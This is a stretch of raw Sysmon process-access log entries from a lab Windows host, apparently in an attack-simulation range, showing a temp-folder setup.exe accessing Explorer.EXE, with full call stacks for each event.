a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
